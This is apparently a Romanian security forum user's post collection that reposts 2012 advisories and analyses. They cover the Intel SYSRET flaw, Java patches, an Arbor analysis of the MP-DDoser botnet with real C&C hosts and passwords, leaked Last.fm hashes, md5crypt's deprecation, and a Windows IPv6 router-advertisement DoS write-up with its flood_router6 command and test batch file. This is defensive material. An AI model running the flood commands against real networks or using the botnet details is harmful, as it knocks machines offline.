me.mello

Cine ar fi crezut Intel...sau hardware in general...sistemele pe 32 biti sunt momentan sigure...insa cele pe 64 sunt in general vulnerabile. SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems. The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there’s a chance Apple’s OS X may also be vulnerable. The flaw was disclosed the vulnerability in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack. VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw or handle it differently.Many of the affected vendors have already pushed out an update that defuses the flaw. Reff: Intel CPU Vulnerability can provide control of your system to attacker | The Hacker News Overview Some 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape. Intel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable. Description A ring3 Ring (computer security) - Wikipedia, the free encyclopedia attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. Details from Xen CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability [Xen-announce] Xen Security Advisory 7 (CVE-2012-0217) - PV privilege escalation A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state. Details from FreeBSD FreeBSD-SA-12:04.sysret: Privilege escalation when returning from kernel http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. Details from Microsoft User Mode Scheduler Memory Corruption Vulnerability - MS12-042 - Important Microsoft Security Bulletin MS12-042 - Important : Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2711167) An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights. Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users. This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. Systems with AMD or ARM-based CPUs are not affected by this vulnerability. Details from Red Hat RHSA-2012:0720-1 https://rhn.redhat.com/errata/RHSA-2012-0720.html & RHSA-2012:0721-1 https://rhn.redhat.com/errata/RHSA-2012-0721.html : It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important) Details from some affected vendors were not available at the time of publication. Impact A local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape. Solution Apply an Update Please review the Vendor Information section of this document for vendor-specific patch and workaround details. Vendor Information: Vendor Status Date Notified Date Updated Citrix Affected - 18 Jun 2012 FreeBSD Project Affected 01 May 2012 12 Jun 2012 Intel Corporation Affected 01 May 2012 13 Jun 2012 Joyent Affected - 14 Jun 2012 Microsoft Corporation Affected 01 May 2012 18 Jun 2012 NetBSD Affected 01 May 2012 08 Jun 2012 Oracle Corporation Affected 01 May 2012 08 Jun 2012 Red Hat, Inc. Affected 01 May 2012 12 Jun 2012 SUSE Linux Affected 02 May 2012 12 Jun 2012 Xen Affected 02 May 2012 12 Jun 2012 AMD Not Affected - 13 Jun 2012 Apple Inc. Not Affected 01 May 2012 08 Jun 2012 VMware Not Affected 01 May 2012 08 Jun 2012 Debian GNU/Linux Unknown 02 May 2012 02 May 2012 Fedora Project Unknown 02 May 2012 02 May 2012 Sursa: US-CERT Vulnerability Note VU#649219 - SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware

Ma simt ca in 2003 sa moara gibilan:))

Bancile nu sunt atat de securizate precum par....majoritatea folosesc win pentru angajati, iar in general nu sunt oameni destui de capabil in a le securiza.

Daca nu mai merge asta https://rstcenter.com/forum/46717-rst-who-fuck.rst da-ti foc!!!

Title: How to Restrict the Use of Certain Cryptographic Algorithms and Protocols in Schannel.dll Nu-mi permit nici chiar asa cu MS, articolul e mai jos, va fi rectificat oricand vor crede ei ca e nevoie, nu va fi sters, plus ca e foarte bine descris si asa. Sursa: How to Restrict the Use of Certain Cryptographic Algorithms and Protocols in Schannel.dll Reff: http://www.mozilla.org/projects/security/pki/nss/ssl/draft302.txt

Ma, da si romanii astia ma frate, e ca si cum ai planta un cacat intr-o zi torida....toate mustele cad in plasa:))

eu cred ca se stia demult si de asta...

dai rr la pc, iti vine sa crezi sau nu de la internet explorer se intampla asta, dai rr si isi revine el.

Oracle says Oracle Java Critical Patch Update - June 2012 it will be patching fourteen vulnerabilities in Java SE (Standard Edition) this coming Tuesday, 12 June. All versions of Java, including the JDK and JRE version 7 update 4 and earlier, version 6 update 32 and earlier, version 5 update 35 and earlier, 1.4_2_37 and earlier, and JavaFX 2.1 and earlier are affected. The company says that it will be strongly recommending that all users apply the patch update "due to the threat posed by a successful attack". Oracle says the highest CVSS base score of the vulnerabilities is 10.0. Twelve of the vulnerabilities may be exploited remotely without any authentication. The problems all reside in the Java Runtime Environment (JRE).

This blog post is the fifth installment in our ongoing series of articles surveying the crypto systems used by different DDoS-capable malware families. Today’s topic is MP-DDoser, also known as “IP-Killer” As far as we are aware, MP-DDoser was first documented in February 2012 by Arbor analyst Curt Wilson in his pioneering survey of modern DDoS threats Attack of the Shuriken: Many Hands, Many Weapons | DDoS and Security Reports | Arbor Networks Security Blog. Like many of the malware families we see these days, MP-DDoser is exclusively a DDoS bot; it has no ability to do key-logging, info-stealing, spamming, or other such mayhem. We started seeing the first MP-DDoser samples back in December 2011, which billed themselves as “Version 1.0?. These early versions had a number of serious flaws, such as a completely broken Slowloris attack implementation, and really awful crypto key management. But the latest samples (now up to “Version 1.6?) are much improved; the key management is quite good, and the buggy DDoS attacks are not only fixed, but now include at least one technique (“Apache Killer”) that may be considered reasonably cutting edge. The full details of our analysis are included in the attached report: http://ddos.arbornetworks.com/uploads/2012/06/Crypto-MPDDOS-Report.pdf, but here are the highlights: In addition to a Slowloris-style attack and various generic flooding capabilities, the newest versions of MP-DDoser support an ApacheKiller-style attack Apache Killer (killapache.pl) Attack – Denial of Service Flaw in Apache WebServer, which is a relatively new (and sophisticated) low-bandwidth technique for inflicting denial-of-service attacks against Apache web servers. It first appeared in the form of a proof-of-concept Perl script Full Disclosure: Apache Killer in August 2011. Then toward the end of 2011 we saw a version of it incorporated into the Armageddon DDoS bot http://ddos.arbornetworks.com/2012/03/its-2012-and-armageddon-has-arrived/; however that implementation turned out to be severely flawed. Now, we are seeing it show up in MP-DDoser – and a review of the bot’s assembly code indicates that it does indeed appear to be a fully functional, working implementation of the Apache Killer attack. The core of the attack involves the sending of a very long Range HTTP header that is intended to bring web servers (especially Apache) to their knees by forcing them to do a great deal of server-side work in response to a comparatively small request. It is therefore one of the more effective low-bandwidth, “asymmetrical” HTTP attacks at the moment. The complete MP-DDoser command code vocabulary is as follows: Command Code Function PP Ping bot, which echoes PP back to C&C TC Similar to PP, but echoes back with TP KC Kill bot client process via ExitProcess() UN Uninstall BK Scan for IRC, IM, Skype processes STF Stop all flooding operations DL Download via URLDownloadToFile() and run via ShellExecute() a new malware binary SFUDP Start UDP Flood SFHTTP Start HTTP Flood SFSL Start Slowloris Flood SFBWD Start “Bandwidth” Flood SFL7 Start Layer 7 attack SFARME Start Apache Range Flood (“Apache Killer”) Besides being armed with some potent DDoS weaponry, MP-DDoser is also interesting because of the multiple layers of encryption it uses for key management in order to secure its network communications. Again, the full details are provided in the attached report, but the high-level summary is as follows: The malware actually uses a pretty straightforward algorithm for encrypting and decrypting the transmissions sent between bot and C&C server. It modulates the plaintext message with a key string using the XOR operator, but it applies this XOR operation only to the least significant 4 bits of each message byte. The following Python snippet replicates MP-DDoser’s network crypting functionality: def decrypt_mpddos_comms(msg_text, key_text): key_bytes = [ord(key_byte) for key_byte in key_text] msg_bytes = [ord(msg_byte) for msg_byte in msg_text] len_key = len(key_bytes) return ''.join([chr((msg_byte & 0xf0) + \ ((msg_byte & 0x0f) ^ (key_bytes[k % len_key] & 0x0f))) \ for k, msg_byte in enumerate(msg_bytes)]) The tricky part is finding the key string! In earlier versions of MP-DDoser, circa late 2011, this key string was simply hard-coded into the bot executable in plain text. But since then, MP-DDoser has improved rapidly on the key management front. Now the key string itself is encrypted and stored in an RCDATA resource named MP, along with some other sensitive information such as the hostname and port of the C&C, the botnet ID, etc.: Furthermore, the algorithm used for decrypting this resource is string is different from the aforementioned algo used for crypting the actual communications. The resource decryption mechanism appears to be a “home brew” algorithm. The details are in the report, but the algorithm can be summarized by the following Python snippet: def decrypt_mpddos_rsrc(rsrc_crypt, plain_lut): accum_A = accum_B = 0 plain_rsrc = [] for rsrc_byte in rsrc_crypt: next_byte = plain_lut.index(rsrc_byte) accum_B = next_byte + (accum_B << 6) accum_A += 6 if accum_A >= 8: accum_A -= 8 plain_rsrc += [(accum_B >> accum_A)] accum_B %= (1 << accum_A) return ''.join([chr(dstbyte) for dstbyte in plain_rsrc]) To decrypt the MP resource string, the bot uses a lookup table (“LUT”) that maps ASCII characters to integers for the initial phase of the decryption loop. But even this lookup table is itself encrypted! Fortunately, it is encrypted using the same algorithm used for crypting the network comms, and thus the aforementioned decrypt_mpddos_comms() Python function will handle it. And mercifully, the key string need to decrypt the LUT happens to be stored in plain text in the bot executable. In all the samples that we’ve encountered to date, that key string is: 00FF00FF00FF, but that could easily change in the future. So in order to decrypt MP-DDos transmissions, one needs to: 1. Decrypt the LUT using decrypt_mpddos_comms(); 2. Then use the LUT to decrypt the MP resource via decrypt_mpddos_rsrc(); 3. Then pull the comms key from the plain text resource and provide it to decrypt_mpddos_comms() to decrypt the actual network traffic. The attached diagram illustrates the process: On top of all that, the bot binary itself is doubly packed using UPX followed by a .Net-based crypter. The author of MP-DDoser has clearly spent some time trying to beef up operational security. We have put all the pieces together into an “auto-ripper” tool that tears apart a memory dump of each MP-DDoser bot we encounter and extracts the three ingredients needed for traffic decryption (highlighted by yellow ovals in the above diagram) for use in our botnet monitoring operations. Once decrypted, the sensitive MP resource ends up being a pipe-delimited string containing C&C host, C&C port, network comms key, installation mutex, installation filename, botnet ID, etc. For example: tgm991.no-ip.info|3030|ipkillerpassword|IPK-MPMutex|-1|Not Available| Windefender.exe|Windefender|IPK-Victim|0| C&C Hostname C&C Port Botnet ID Crypto Password 108.38.80.106 3178 IPK-Victim ipkillerpassword 127.0.0.1 19302 IPK-Victim ipkillerpassword 176.31.114.45 2020 IPK-Victim ipkillerpassword 192.162.102.192 1337 IPK-Tayran ipkillerpassword 62.29.106.51 3030 silici ipkillerpassword 69.14.75.176 3030 IPK-RSTool hackingrs biofaction.no-ip.biz 6666 SWAG cool biofaction.no-ip.biz 6666 Silent cool blackzone.cc 3030 IPK-BZ ipkillerpassword boing7898.no-ip.biz 5992 Commander codeleak charloservs2.no-ip.biz 87 IPK-Victim 12344321 explorexe.no-ip.biz 3085 Default 94252310dcim15 internetlogger.no-ip.org 8080 IPK-Victim 118118 joshkozman10.no-ip.biz 3030 IPK-Victim3030 josh11463 lockdown420.no-ip.biz 3030 Monk ipkiller lockdown420.no-ip.biz 3030 Recover ipkiller p3d.no-ip.info 4444 ExploitedJDB ipkillerpassword sakiir.no-ip.biz 2020 IPK-Mine Hacktivisme lol stehulme.no-ip.org 5504 IPK-Victim steveboy7 street.no-ip.biz 3030 IPK-Victim ipkillerpassword tgm991.no-ip.info 3030 IPK-Victim ipkillerpassword tr9.no-ip.info 3175 Bshade ipkillerpassword or... MP-DDoser: A rapidly improving DDoS threat | DDoS and Security Reports | Arbor Networks Security Blog Applying this information to live MP-DDoser traffic yields transmissions formatted as follows (with some information modified to protect the parameters of our sandbox machines of course): Encrypted Bot Phone Home Transmission: 0x0000 48 47 7e 41 67 65 60 75 68 77 49 3c 2f 33 75 4d HG~Age`u hwIq Vlg`mrq# 0x0030 59 50 24 7b 31 3b 7d YP${1;} Decrypted Transmission: AC|Default@1.6|Idle...|Hawkeye@Mash4077|Windows XP x86| he AC stands for “Add Client”; Default corresponds to the botnet ID, and 1.6 is the MP-DDoser version. The remainder of the phone home message contains the usual information, such as bot status (Idle), and username, computer name, and operating system of the infected machine. All in all, MP-DDoser uses some of the better key management we have seen. But of course, at the end of the day, every bot has to contain – or be able to generate – its own key string in order to communicate with its C&C, so no matter how many layers of encryption our adversary piles on, they can always be peeled off one by one. The complete reverse engineering report for this version of MP-DDoser is available here: http://ddos.arbornetworks.com/uploads/2012/06/Crypto-MPDDOS-Report.pdf To summarize, the MP-DDoser code base is clearly being actively developed, and is improving rapidly on both the attack/flooding capability and network crypto fronts. We will keep monitoring this evolving DDoS threat in order to stay one step ahead of it – and use the intel we gather to continue defending our customers. Sursa: MP-DDoser: A rapidly improving DDoS threat | DDoS and Security Reports | Arbor Networks Security Blog Rog un admin/mod sa il mute la programare sau tutoriale engleza daca are impresia ca nu aici ii e locul, dar nu cred ca e cazul.

A list with several million passwords belonging to users of the music community site Last.fm Last.fm - Listen to internet radio and the largest music catalogue online has been posted on the internet. The site owners have posted a statement Last.fm Passwort Sicherheits-Update – Last.fm saying that the company is investigating the leak and that all users of the service should change their passwords immediately. This is the third major compromise of a popular web site's passwords in as many days. The H's associates at heise Security are in possession of a list containing approximately 2.5 million password hashes. Like the recently leaked data from eHarmony eHarmony admits to leaking 1.5 million passwords - The H Security: News and Features, these are unsalted MD5 hashes that are trivial to crack in today's world of fast CPU and GPU hardware and specialised techniques such as using rainbow tables Cheap Cracks - Of dictionaries and rainbows - The H Security: News and Features. At least one million of these hashes have already been cracked and the clear text passwords have also been posted on the internet. The hashes that were leaked from LinkedIn LinkedIn passwords in circulation – Update - The H Security: News and Features were generated using the SHA-1 algorithm. Users of the Last.fm service are advised to change their password immediately. Furthermore, it would be prudent for any users who have reused their passwords to change them on other web sites as well. The article Storing passwords in uncrackable form Storing passwords in uncrackable form - The H Security: News and Features at The H Security explains how server administrators can prevent passwords from being cracked this easily. Sursa: Millions of Last.fm passwords leaked - The H Security: News and Features

Spuneti-mi si mie ce ar fi fost meebo fara YM sau Live? Credeti ca cu ICQ facea el treaba?...un rahat, cum am spus si mai sus, sunt satul de google...mai ales de chrome...un pisat plin de boti cu care for sa imite fiecare program dupa windows in asa-zisele extensii, acum google drive cu cele 5 gb stocare vor sa ia mau' celorlalte companii in combinatie cu chrome tools for google drive faci mare rahat... Scapati naibii de conturile de la google orice faceti pe acel cont, se stie. Eu am msn...acum Live de peste 10 ani, si acum mai mult ca niciodata ma simt extrem de multumit...macar stiu ca datele mele sunt la microsoft, nu la o companie care vrea sa detina monopolul in free shits...niciodata chestiile nu sunt atat de moka precum par. Si da am si eu skydrive...office online, webmail, live esentials...pot sa scriu pe bloguri din writer, + ca daca as dori vreaodata sa ma conectez la ceva...pot face lucru asta cu foarte multe servicii. Asa cum spuneam mai sus, sper din tot sufletul ca Yahoo!! si Microsoft sa faca in asa fel incat sa nu mai dea voie la macaronarii astia de la google sa se foloseasca de serviciile lor, nu cred ca cineva nu o sa mai foloseasca YM doar pentru ca nu merge cu google shit asta.

NAME libuser.conf - configuration for libuser and libuser utilities FILE FORMAT libuser.conf is a text file. Leading and trailing white space on each line is ignored. Lines starting with # are ignored. The file defines variables grouped into sections. Each section starts with a section header: [section name] A single section header can appear more than once in the file. The lines following a section header define variables from that section: variable = value The value can be empty. A variable can have more than one value, specified by using more than one line defining that variable. All currently defined variables accept only the first value and ignore the others, if any. [defaults] create_modules A list of module names to use when creating user or group entries, unless the application specifies a different list. The module names in the list can be separated using space, tab or comma. Default value is files shadow. crypt_style The algorithm to use for password encryption when creating new passwords. The current algorithm may be retained when changing a password of an existing user, depending on the application. Possible values are des, md5, blowfish, sha256 and sha512, all case-insensitive. Unrecognized values are treated as des. Default value is des. hash_rounds_min, hash_rounds_max These variables specify an inclusive range of hash rounds used when crypt_style is sha256 or sha512. A number of hash rounds is chosen from this interval randomly. A larger number of rounds makes password checking, and brute-force attempts to guess the password by reversing the hash, more CPU-intensive. The number of rounds is restricted to the interval [1000, 999999999]. If only one of the above variables is specified, the number of rounds used is specified by the other variable. If neither variable is specified, the number of rounds is chosen by libc. mailspooldir The directory containing user’s mail spool files. Default value is /var/mail. moduledir The directory containing libuser modules. Default value uses the modules installed with libuser, corresponding to the architecture of the libuser library, e.g. /usr/lib/libuser or /usr/lib64/libuser (assuming libuser was configured with --prefix=/usr). modules A list of module names to use when not creating user or group entries, unless the application specifies a different list. The module names in the list can be separated using space, tab or comma. Default value is files shadow. skeleton The directory containing files to copy to newly created home directories. Default value is /etc/skel. [import] login_defs A path to the login.defs file from shadow. If this variable is defined, the variables from the named file are used in place of some libuser variables. Variables explicitly defined in libuser.conf are not affected by contents of login.defs. The following variables are imported: | Variable | Imported as ---------------------+------------------------------- ENCRYPT_METHOD | defaults/crypt_style GID_MIN | groupdefaults/LU_GIDNUMBER MAIL_DIR | defaults/mailspooldir MD5_CRYPT_ENAB | defaults/crypt_style PASS_MAX_DAYS | userdefaults/LU_SHADOWMAX PASS_MIN_DAYS | userdefaults/LU_SHADOWMIN PASS_WARN_AGE | userdefaults/LU_SHADOWWARNING SHA_CRYPT_MIN_ROUNDS | defaults/hash_rounds_min SHA_CRYPT_MAX_ROUNDS | defaults/hash_rounds_max UID_MIN | userdefaults/LU_UIDNUMBER The following variables are not imported: CREATE_HOME, GID_MAX, MAIL_FILE, SYSLOG_SG_ENAB, UID_MAX, UMASK, USERDEL_CMD, USERGROUPS_ENAB default_useradd A path to the default/useradd file from useradd in shadow. If this variable is defined, the variables from the named file are used in place of some libuser variables. Variables explicitly defined in libuser.conf are not affected by contents of default/useradd. The following variables are imported: | Variable | Imported as ---------+-------------------------------- EXPIRE | userdefaults/LU_SHADOWEXPIRE GROUP | userdefaults/LU_GIDNUMBER HOME | userdefaults/LU_HOMEDIRECTORY INACTIVE | userdefaults/LU_SHADOWINACTIVE SHELL | userdefaults/LU_LOGINSHELL SKEL | defaults/skeleton The HOME variable value has /%n appended to it before importing. [userdefaults] This section defines attribute values of newly created user entities. There is one special variable: LU_UIDNUMBER A decimal number, the first allowed UID value for regular users (not system users). Default value is 500. All other variables have the same names as the attribute names from <libuser/entity.h> and define attribute values. Either the macro name (e.g. LU_GECOS) or the macro content (e.g. pw_gecos) can be used; if both are used, the one appearing later in the configuration file is used. The % character in the value of the variable introduces an escape sequence: %n is replaced by the user name, %d is replaced by current date in days since the epoch, %u is replaced by the user’s UID. There is no way to escape the % character and avoid this substitution. After the userdefaults section is processed, modules may define additional attributes or even override the attributes defined in this section. [groupdefaults] The groupdefaults section is similar to userdefaults. There is one special variable: LU_GIDNUMBER A decimal number, the first allowed GID value for regular groups (not system groups). Default value is 500. The other variables follow the same rules as in the userdefaults section, except that %n and %u are replaced by the group name and group’s GID, respectively. After the groupdefaults section is processed, modules may define additional attributes or even override the attributes defined in this section. [files] Configures the files module, which manages /etc/group and /etc/passwd. The configuration variables are probably useful only for libuser development. directory The directory containing the group and passwd files. Default value is /etc. nonroot Allow module initialization when not invoked as the root user if the value is yes. [shadow] Configures the files module, which manages /etc/gshadow and /etc/shadow. The configuration variables are probably useful only for libuser development. directory The directory containing the gshadow and shadow files. Default value is /etc. nonroot Allow module initialization when not invoked as the root user if the value is yes. [ldap] Configures the ldap module, which manages an user database accessible using LDAP. userBranch The LDAP suffix for user entities. Default value is ou=People. groupBranch The LDAP suffix for group entities. Default value is ou=Group. server A domain name or an URI of the LDAP server. The URI can use the ldap or the ldaps protocol. When a simple domain name is used, the connection fails if TLS can not be used; an URI using the ldap protocol allows connection without TLS. Default value is ldap. basedn The base DN of the server. Default value is dc=example,dc=com. binddn A DN for binding to the server. If the value is empty or binding using this DN fails, a DN of uid=user,userBranch,basedn is used, where userBranch and basedn are variables from this section and user is the user name of the invoking user, unless overridden by the user variable from this section. Default value is cn=manager,dc=example,dc=com. user The SASLv2 identity for authenticating to the LDAP server, also overrides the user name for generating a bind DN. Default value is the name of the invoking user. authuser The SASLv2 authorization user, if non-empty. Default value is empty. bindtype The list of bind types to use, separated by commas. Allowed bind types are simple, sasl, and sasl/mechanism, where mechanism is a SASL mechanism. The bind types (but not necessarily mechanism) are case-insensitive. If more than one bind type is specified, their relative order is ignored. Default value is simple,sasl. [sasl] Configures the sasl module, which manages a SASLv2 user database. appname Name of the SASLv2 application. Default value is empty. domain Domain used by libuser for the SASLv2 authentication object. Default value is empty. BUGS Invalid lines in the configuration file (or the imported shadow configuration files) are silently ignored. FILES /etc/libuser.conf The default location of the configuration file. Can be overridden by the LIBUSER_CONF environment variable, except in set-uid or set-gid programs. Sursa: Ubuntu Manpage: libuser.conf - configuration for libuser and libuser utilities

THE AUTHOR of md5crypt(), which is used to encrypt passwords on some FreeBSD and Linux-based operating systems, has said it is no longer secure despite being recommended as a password hashing function. Poul-Henning Kamp implemented Ronald Rivest's MD5 one-way hashing algorithm in his md5crypt() function that has been in use on FreeBSD and Linux-based operating systems for many years. Now Kamp has been forced to say that md5crypt() is no longer secure Md5crypt Password scrambler is no longer considered safe by author — PHKs Bikeshed after he claimed that people were still recommending it for production use. While Kamp introduced extra functionality in md5crypt() to mitigate against brute-force attacks, processing power has increased to a point where Kamp said that md5crypt() is too fast on commercially available hardware. He told The INQUIRER, "[The] only problem with md5crypt is speed: it's too fast." Kamp also told The INQUIRER that it had been known for some time that md5crypt() could no longer provide adequate protection, but since people were still recommending the use of md5crypt() in production environments that forced him to make an announcement, urging people to stop using his creation. While MD5 was cracked using brute force methods back in 2005, Kamp included extra stages in md5crypt() such as salting to increase its computational complexity, and md5crypt() remained too processor intensive for brute force attacks for a while longer. However md5crypt() is the best part of two decades old by now and more computing power, especially with GPGPUs, has meant that hackers can execute md5crypt() on every combination of 10 letters and numbers in a matter of hours. All hashing algorithms eventually become susceptible to brute-force attacks due to advances in computational power. However the fact that Kamp has been forced to make such an announcement shows that bad practices are still far too common, and that can cost people in terms of security. Sursa: Even The Author Says md5crypt() Is No Longer Secure ? Packet Storm

Pregatiti-va ca aveti mult de citit + referinte dar aveti ce invata, IPv6 vulnerabil, o vulnerabilitate atat de mare incat un atacator poate opri toate pc-urile din retea, xBox PS3, FreeBds, Win8 cu doar o pagina web .html, o prezentare foarte bine descrisa de Sam Bowne, Have Fun. Executive Summary This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown. A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details. Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles. Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN! As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Mark Heuse* that they don't intend to patch this. Responsible Disclosure I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack--it has been publicly known for months: Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability: Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-4669) Mitigation There is no patch from Microsoft. But there are three four ways I know of to protect your computers: Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you. Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below. Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below. Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator Added 5-30-2011: Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation: Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator Turning Off Router Discovery I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt): netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled I found that solution here: IPv6: stateless autoconfiguration / manual configuration Blocking Rogue Router Advertisements with Windows Firewall This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense. To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page: In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page: The Attack cd /pentest/spoofing/thc-ipv6 ./flood_router6 eth0 Ctrl+C Result Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then with IPCONFIG you can see the effect on the target. Batch File to Test for Vulnerability On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code. ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY @ECHO OFF netsh int ipv6 set addr "Local Area Connection" dead:1::1/64 netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:407::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #1 OF 3 netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:408::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #2 OF 3 netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes ping 127.0.0.1 -n 3 -w 1000 netsh int ipv6 del route dead:409::/64 "Local Area Connection" ECHO SENDING ADVERTISEMENT #3 OF 3 ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead:: The result on a vulnerable machine: Class Projects Here are some projects designed for use in schools and demonstrations: Win 7 DoS by RA Packets : Project 8x: Win 7 DoS by RA Packets (20 pts.) --a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine. Router Advertisements with scapy: Project 9x: Router Advertisements with scapy (20 pts.) -- with scapy, you can craft packets easily so you can try variations of the attack. How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.) FreeBSD is Vulnerable Too At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below (click for full-size image): The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine. So I slowed the attack down to approximately 100 RAs per second to capture this image: 100 RAs per second raised the CPU to 19.9% in my test. I filed a bug report. kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu linux and Mac OS X do. I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011) Windows 8 Developer Preview is Vulnerable Too This video was made by Josival Junior--good work! Written by Sam Bowne; last modified 12 pm May 30, 2011 * On April 6 I mistakenly attributed Mark Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011. 6-17-11: Fixed anchor tag error 9-15-2011: Added Win 8 Developer Preview video Sper sa invatati ceva din asta si sa nu credeti ca IPv6 e mai sigur decat 4 si ca va revolutiona lumea, asa cum zice si articolul, companii gen Microsoft nu au de gand sa faca ceva in legatura cu asta, ba mai mult zic ca aceasta vulnerabilitate exista de luni bune. Sursa: Win 7 DoS by RA Packets

